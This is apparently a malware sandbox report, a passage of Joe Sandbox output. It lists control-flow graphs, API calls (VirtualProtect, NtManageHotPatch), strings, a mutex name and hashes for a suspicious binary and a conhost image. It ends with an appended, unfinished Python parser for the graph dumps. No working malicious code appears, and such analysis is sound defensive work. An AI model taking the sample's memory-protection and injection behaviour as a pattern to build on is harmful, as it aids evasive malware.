4159->4158 4161 7ff70116143b 4160->4161 4162 7ff701161440 4161->4162 4163 7ff701161394 2 API calls 4161->4163 4164 7ff701161394 2 API calls 4162->4164 4163->4162 4165 7ff70116144f 4164->4165 4166 7ff701161394 2 API calls 4165->4166 4167 7ff701161459 4166->4167 4168 7ff70116145e 4167->4168 4169 7ff701161394 2 API calls 4167->4169 4170 7ff701161394 2 API calls 4168->4170 4169->4168 4171 7ff701161468 4170->4171 4172 7ff70116146d 4171->4172 4173 7ff701161394 2 API calls 4171->4173 4174 7ff701161394 2 API calls 4172->4174 4173->4172 4175 7ff701161477 4174->4175 4176 7ff70116147c 4175->4176 4177 7ff701161394 2 API calls 4175->4177 4178 7ff701161394 2 API calls 4176->4178 4177->4176 4179 7ff701161486 4178->4179 4180 7ff70116148b 4179->4180 
4181 7ff701161394 2 API calls 4179->4181 4182 7ff701161394 2 API calls 4180->4182 4181->4180 4183 7ff701161495 4182->4183 4184 7ff70116149a 4183->4184 4185 7ff701161394 2 API calls 4183->4185 4186 7ff701161394 2 API calls 4184->4186 4185->4184 4187 7ff7011614a4 4186->4187 4188 7ff7011614a9 4187->4188 4189 7ff701161394 2 API calls 4187->4189 4190 7ff701161394 2 API calls 4188->4190 4189->4188 4191 7ff7011614b3 4190->4191 4192 7ff7011614b8 4191->4192 4193 7ff701161394 2 API calls 4191->4193 4194 7ff701161394 2 API calls 4192->4194 4193->4192 4195 7ff7011614c2 4194->4195 4196 7ff7011614c7 4195->4196 4197 7ff701161394 2 API calls 4195->4197 4198 7ff701161394 2 API calls 4196->4198 4197->4196 4199 7ff7011614d6 4198->4199 4200 7ff701161394 2 API calls 4199->4200 4201 7ff7011614e0 4200->4201 4202 7ff701161394 2 API calls 4201->4202 4203 7ff7011614e5 4202->4203 4204 7ff701161394 2 API calls 4203->4204 4205 7ff7011614f4 4204->4205 4206 7ff701161394 2 API calls 4205->4206 4207 7ff701161503 4206->4207 4208 7ff701161394 2 API calls 4207->4208 4209 7ff701161512 4208->4209 4210 7ff701161394 2 API calls 4209->4210 4211 7ff701161521 4210->4211 4212 7ff701161530 4211->4212 4213 7ff701161394 2 API calls 4211->4213 4214 7ff701161394 2 API calls 4212->4214 4213->4212 4215 7ff70116153a 4214->4215 4216 7ff70116153f 4215->4216 4217 7ff701161394 2 API calls 4215->4217 4218 7ff701161394 2 API calls 4216->4218 4217->4216 4219 7ff70116154e 4218->4219 4220 7ff701161394 2 API calls 4219->4220 4221 7ff701161558 4220->4221 4222 7ff70116155d 4221->4222 4223 7ff701161394 2 API calls 4221->4223 4224 7ff701161394 2 API calls 4222->4224 4223->4222 4225 7ff701161567 4224->4225 4226 7ff70116156c 4225->4226 4227 7ff701161394 2 API calls 4225->4227 4228 7ff701161394 2 API calls 4226->4228 4227->4226 4229 7ff701161576 4228->4229 4230 7ff70116157b 4229->4230 4231 7ff701161394 2 API calls 4229->4231 4232 7ff701161394 2 API calls 4230->4232 4231->4230 4233 7ff701161585 4232->4233 4234 7ff70116158a 4233->4234 
4235 7ff701161394 2 API calls 4233->4235 4236 7ff701161394 2 API calls 4234->4236 4235->4234 4237 7ff701161599 4236->4237 4238 7ff701161394 2 API calls 4237->4238 4239 7ff7011615a3 4238->4239 4240 7ff7011615a8 4239->4240 4241 7ff701161394 2 API calls 4239->4241 4242 7ff701161394 2 API calls 4240->4242 4241->4240 4243 7ff7011615b7 4242->4243 4244 7ff701161394 2 API calls 4243->4244 4245 7ff7011615c1 4244->4245 4246 7ff7011615c6 4245->4246 4247 7ff701161394 2 API calls 4245->4247 4248 7ff701161394 2 API calls 4246->4248 4247->4246 4249 7ff7011615d0 4248->4249 4250 7ff7011615d5 4249->4250 4251 7ff701161394 2 API calls 4249->4251 4252 7ff701161394 2 API calls 4250->4252 4251->4250 4253 7ff7011615df 4252->4253 4254 7ff701161394 2 API calls 4253->4254 4255 7ff7011615e4 4254->4255 4256 7ff701161394 2 API calls 4255->4256 4257 7ff7011615f3 4256->4257 4257->3831 4259 7ff701161394 2 API calls 4258->4259 4260 7ff70116143b 4259->4260 4261 7ff701161440 4260->4261 4262 7ff701161394 2 API calls 4260->4262 4263 7ff701161394 2 API calls 4261->4263 4262->4261 4264 7ff70116144f 4263->4264 4265 7ff701161394 2 API calls 4264->4265 4266 7ff701161459 4265->4266 4267 7ff70116145e 4266->4267 4268 7ff701161394 2 API calls 4266->4268 4269 7ff701161394 2 API calls 4267->4269 4268->4267 4270 7ff701161468 4269->4270 4271 7ff70116146d 4270->4271 4272 7ff701161394 2 API calls 4270->4272 4273 7ff701161394 2 API calls 4271->4273 4272->4271 4274 7ff701161477 4273->4274 4275 7ff70116147c 4274->4275 4276 7ff701161394 2 API calls 4274->4276 4277 7ff701161394 2 API calls 4275->4277 4276->4275 4278 7ff701161486 4277->4278 4279 7ff70116148b 4278->4279 4280 7ff701161394 2 API calls 4278->4280 4281 7ff701161394 2 API calls 4279->4281 4280->4279 4282 7ff701161495 4281->4282 4283 7ff70116149a 4282->4283 4284 7ff701161394 2 API calls 4282->4284 4285 7ff701161394 2 API calls 4283->4285 4284->4283 4286 7ff7011614a4 4285->4286 4287 7ff7011614a9 4286->4287 4288 7ff701161394 2 API calls 4286->4288 4289 7ff701161394 
2 API calls 4287->4289 4288->4287 4290 7ff7011614b3 4289->4290 4291 7ff7011614b8 4290->4291 4292 7ff701161394 2 API calls 4290->4292 4293 7ff701161394 2 API calls 4291->4293 4292->4291 4294 7ff7011614c2 4293->4294 4295 7ff7011614c7 4294->4295 4296 7ff701161394 2 API calls 4294->4296 4297 7ff701161394 2 API calls 4295->4297 4296->4295 4298 7ff7011614d6 4297->4298 4299 7ff701161394 2 API calls 4298->4299 4300 7ff7011614e0 4299->4300 4301 7ff701161394 2 API calls 4300->4301 4302 7ff7011614e5 4301->4302 4303 7ff701161394 2 API calls 4302->4303 4304 7ff7011614f4 4303->4304 4305 7ff701161394 2 API calls 4304->4305 4306 7ff701161503 4305->4306 4307 7ff701161394 2 API calls 4306->4307 4308 7ff701161512 4307->4308 4309 7ff701161394 2 API calls 4308->4309 4310 7ff701161521 4309->4310 4311 7ff701161530 4310->4311 4312 7ff701161394 2 API calls 4310->4312 4313 7ff701161394 2 API calls 4311->4313 4312->4311 4314 7ff70116153a 4313->4314 4315 7ff70116153f 4314->4315 4316 7ff701161394 2 API calls 4314->4316 4317 7ff701161394 2 API calls 4315->4317 4316->4315 4318 7ff70116154e 4317->4318 4319 7ff701161394 2 API calls 4318->4319 4320 7ff701161558 4319->4320 4321 7ff70116155d 4320->4321 4322 7ff701161394 2 API calls 4320->4322 4323 7ff701161394 2 API calls 4321->4323 4322->4321 4324 7ff701161567 4323->4324 4325 7ff70116156c 4324->4325 4326 7ff701161394 2 API calls 4324->4326 4327 7ff701161394 2 API calls 4325->4327 4326->4325 4328 7ff701161576 4327->4328 4329 7ff70116157b 4328->4329 4330 7ff701161394 2 API calls 4328->4330 4331 7ff701161394 2 API calls 4329->4331 4330->4329 4332 7ff701161585 4331->4332 4333 7ff70116158a 4332->4333 4334 7ff701161394 2 API calls 4332->4334 4335 7ff701161394 2 API calls 4333->4335 4334->4333 4336 7ff701161599 4335->4336 4337 7ff701161394 2 API calls 4336->4337 4338 7ff7011615a3 4337->4338 4339 7ff7011615a8 4338->4339 4340 7ff701161394 2 API calls 4338->4340 4341 7ff701161394 2 API calls 4339->4341 4340->4339 4342 7ff7011615b7 4341->4342 4343 7ff701161394 

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction ID: 6f40f79caf2dcdff54d843ffdc4936b84d88b7513e5e7c06d1edbc3a6e842816
                                                        • Opcode Fuzzy Hash: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction Fuzzy Hash: B5515575A19B0695FB18BB25FD503B9E3A5BF88784F809035CA0D833A1DFBEA4518360

                                                        Control-flow Graph

                                                        APIs
                                                        • NtManageHotPatch.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701161156), ref: 00007FF7011613F7
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: ManagePatch
                                                        • String ID:
                                                        • API String ID: 863949556-0
                                                        • Opcode ID: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction ID: 24d18318abf6459c782bb5039b9639707ab948e91b45861f676a6c94a14994fb
                                                        • Opcode Fuzzy Hash: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction Fuzzy Hash: 0CF0B272A0CB4682D718EB51FC4002ABBB0FF98380B404839EA9C82725DFBDE050CB64

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction ID: 5b489c7c63140a25023f580e88a1a5fa58824b2cb63115956e2636f7495abf1a
                                                        • Opcode Fuzzy Hash: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction Fuzzy Hash: 2CB17E2191CBC285F725AB25F8453BAF7A0FF90348F805239EA8C52695DFBED145CB60

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction ID: 9ad42e07f897b08dfcc8b41e645dc698d8cabf70221ccc5386f170d998d9c566
                                                        • Opcode Fuzzy Hash: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction Fuzzy Hash: 14026C22908B8181E720AB19FC443AAF7A4FF857A8F804239EA9C477E5DFBDD145C750

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161CC7
                                                        • memcpy.MSVCRT ref: 00007FF701161CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction ID: f35faa150b09a134261aa54fb586c400c9b6e85fde707cb40ddb8aea6e93765a
                                                        • Opcode Fuzzy Hash: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction Fuzzy Hash: A1419061A08A4691EB18AB05FC446BCB7A0EF95BC4FD48436CE0D83795DFBEE541C360

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction ID: 05fcfb0f62414ccdc21330374a0ed9787120dfe9a8742f8f79d91e58fbc29ec0
                                                        • Opcode Fuzzy Hash: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction Fuzzy Hash: B321C924A09A0281FB19BB01FD45374F6A1BF20B95FC44039C90D576A4DFBEB846C360

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction ID: 0e0c077e2389ab9dc09b2f81cd16efe0846a4ed668a4d48396a6c82b26a59dbf
                                                        • Opcode Fuzzy Hash: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction Fuzzy Hash: B121DE22F0C21651FB2DB324BD8037991819FD4764FA48575D90D833D4CFEEEC8982A2

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701161247), ref: 00007FF7011619F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction ID: 11f8f0382dc5f4d9ad9bcc1ebf58d3ffa01812db9a178edb1b67a0f406b6bf43
                                                        • Opcode Fuzzy Hash: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction Fuzzy Hash: A1516F22E08546D6EB18AB21FC407B8B7A1EF54B98F849135D91C07794DFBEE481C720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 698 7ff701161800-7ff701161810 699 7ff701161824 698->699 700 7ff701161812-7ff701161822 698->700 701 7ff70116182b-7ff701161867 call 7ff701162290 fprintf 699->701 700->701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction ID: 604c85177740a2a0b961d12bb6668da54afa43531845160f020ef6917797ceb2
                                                        • Opcode Fuzzy Hash: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction Fuzzy Hash: 2CF0C211E08A4982E714BB24BD410B9E361EF493D4F90D235DE4D53255DF6DE1828310

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction ID: 4fd915e376cc2f4d9b20d05994451e46c6902ce01cc12ae09bebad57e1f7c4fe
                                                        • Opcode Fuzzy Hash: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction Fuzzy Hash: 1501E825A0DA0282F71ABB11FD04274F2A0BF14B95FC48035CA0D536A4DFBEB996C260

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:829
                                                        Total number of Limit Nodes:2

                                                        Callgraph

                                                        [callgraph of the image mapped at 0000000140000000, node ids 0 to 101. The hub is Function_0000000140001394 (node 72): the small helpers at Function_00000001400014xx and Function_00000001400015xx all call it, and it in turn calls Function_0000000140005D10 and Function_0000000140005A60, both of which call Function_0000000140005A50. Function_0000000140003150 (node 38) and Function_00000001400026E0 (node 100) fan out to most of those helpers; Function_0000000140001160 (node 48) calls itself as well as Function_0000000140003150, Function_0000000140001870, Function_0000000140001880, Function_0000000140001F90 and Function_00000001400016C0.]

                                                        Control-flow Graph

                                                        APIs
                                                        • NtReleaseWorkerFactoryWorker.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: Worker$FactoryRelease
                                                        • String ID:
                                                        • API String ID: 4113960433-0
                                                        • Opcode ID: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                        • Instruction ID: 0a01b27cd887de470f3a79e9e26df08ee21fc81555de9c41fe10c45f52e6a1ec
                                                        • Opcode Fuzzy Hash: 1e727cabbff0cae9e27b261b2207436e6fa371e00c3f64abe26120617a749e69
                                                        • Instruction Fuzzy Hash: CAF0AFB2608B408AEA12DF52F89579A77A0F38D7C0F00991ABBC843735DB3CC190CB40

                                                        Control-flow Graph

                                                        [control-flow graph of the function at 1400026e0: 37 basic blocks; calls Function_0000000140002660, Function_000000014000155d, Function_00000001400014c7, Function_0000000140001503, Function_0000000140005a50, Function_0000000140001370, Function_00000001400014e5, Function_00000001400014a9 (x2), Function_00000001400014f4, Function_000000014000145e (x3 and x1) and Function_0000000140001512; imports wcsncmp, wcscpy, wcscat and wcslen]
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000023.00000002.3365332941.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000023.00000002.3365239770.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366595443.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366690377.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000023.00000002.3366732968.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                        Similarity
                                                        • API ID: wcslen$wcscatwcscpywcsncmp
                                                        • String ID: 0$X$\BaseNamedObjects\ebrlswnkdyyxlbjuhpveplar$`
                                                        • API String ID: 597572034-3053274307
                                                        • Opcode ID: 8a08bf91d6c25843e63d5b2ff1be0b4d4663f99253e455713b2a47471607218e
                                                        • Instruction ID: 54cc81b0cc6ec1b059e349223bab6f0a862094673fb8261370da5aef119cf5ad
                                                        • Opcode Fuzzy Hash: 8a08bf91d6c25843e63d5b2ff1be0b4d4663f99253e455713b2a47471607218e
                                                        • Instruction Fuzzy Hash: 801248B2608BC085E762CB16F8443EA77A4F789794F414215EBA857BF5EF78C189C700
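Because the callgraph at the top of this section and the per-function control_flow_graph entries (such as the one for the \BaseNamedObjects\ string-comparison function at 1400026e0) are only the serialized data of the report's graph widgets, extracting the call structure from them by hand is tedious. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses both dump formats and answers the two questions an analyst usually has at this point, which imports a function touches and what a given function transitively calls. The grammar it implements is inferred from the dumps on this page and is an assumption; the embedded samples are constructed excerpts of this page's own dumps (the fprintf function at 140001800, part of the function at 1400026e0, and the callgraph neighbourhood of Function_0000000140001394).

```python
"""Parse the text form of Joe Sandbox 'callgraph' and 'control_flow_graph'
dumps (the serialized graph data seen on this report page).
Grammar is inferred from the dumps on the page (assumption)."""
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]+(?:-[0-9a-fA-F]+)?$")
FUNC_RE = re.compile(r"^Function_([0-9A-Fa-f]+)$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    internal_calls: list = field(default_factory=list)  # [callee_addr, count]
    api_calls: list = field(default_factory=list)       # [api_name, count]


@dataclass
class Graph:
    nodes: dict = field(default_factory=dict)  # id -> Block (cfg) or func addr (callgraph)
    edges: list = field(default_factory=list)  # (src_id, dst_id)


def parse_cfg(text: str) -> Graph:
    """'<id> <addr>[-<addr>]' opens a basic block; 'call <addr>' and bare
    identifiers are its callees, each optionally followed by '* <n>';
    '<a>-><b>' is a flow edge between block ids."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    g, block, last = Graph(), None, None
    i = 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            g.edges.append((int(m[1]), int(m[2])))
            i += 1
        elif NODE_ID_RE.match(tok):
            # A block id is always followed by its address (range), even when
            # the address happens to consist only of decimal digits.
            addr = toks[i + 1]
            if not ADDR_RE.match(addr):
                raise ValueError(f"expected address after block id {tok}, got {addr!r}")
            lo, _, hi = addr.partition("-")
            block = Block(int(tok), int(lo, 16), int(hi or lo, 16))
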